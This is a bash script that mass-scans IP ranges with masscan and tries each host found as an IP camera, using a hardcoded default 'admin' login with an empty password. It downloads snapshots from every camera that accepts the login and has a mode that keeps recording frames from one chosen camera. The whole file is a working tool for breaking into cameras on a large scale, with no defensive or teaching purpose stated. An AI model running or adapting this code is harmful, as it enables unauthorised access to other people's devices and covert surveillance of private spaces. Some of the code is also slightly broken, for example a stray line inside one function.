#!/usr/bin/env bash


function load(){
# $1 - url , $2 - path 
return $(wget -O "$2" --tries=1 --timeout 5 "http://$1/Streaming/channels/1/picture/?auth=YWRtaW46") 
}


function scan(){

# $1 port, $2 - ranges,  $3 - result file

scan_path="hosts"
res_path="res.txt"

 if test -n "$2"      
then
	scan_path="$2"
 fi

if test -n "$3"     
then
	res_path="$3"
 fi

sudo masscan -p$1 -iL "$scan_path" --rate=2000 | grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}" > "$res_path"
}


function brute(){
a
source_ip="res.txt"
 if test -n "$1"     
then
	source_ip="$1"
 fi

goods=$(date +%H-%M-%S)
mkdir "$goods"
INC=0
while read line
do
if load "$line" "$goods/$line.jpg"
then
	INC=$((INC+1))
else
	rm "$goods/$line.jpg"
fi
done < "$source_ip"
return $INC
}



##################################
###  main  code                ###
##################################

case "$1" in

### scan
"scan" )
echo "scaning"
scan $2 $3 $4
;;


### loader 
"brute" )
echo "Brute"
brute $2
;;


#### main code
"" | "start" )
echo "main"
scan 8000 $2 temp_res.txt
scan 80 temp_res.txt 
rm temp_res.txt
c_ret=0
c_ret=$(brute) 
rm temp_res.txt
echo "Done - total: $c_ret"
;;


#### capture stream
"rec" )
echo "$2 -> rec_$2"
trap "echo EXIT; exit" SIGINT
mkdir "rec_$2"
while true
do
load "$2" "rec_$2/$(date +%s).jpg"
done
;;

##### help
"-h" | "-?" | "--help" )
echo "ver 0.1b"
echo "scan" 
echo "brute"
echo 'rec - rec ip  ex. kikka rec 127.0.0.1 '
echo "no args | start"= scan hosts + brute res.txt
;;

esac


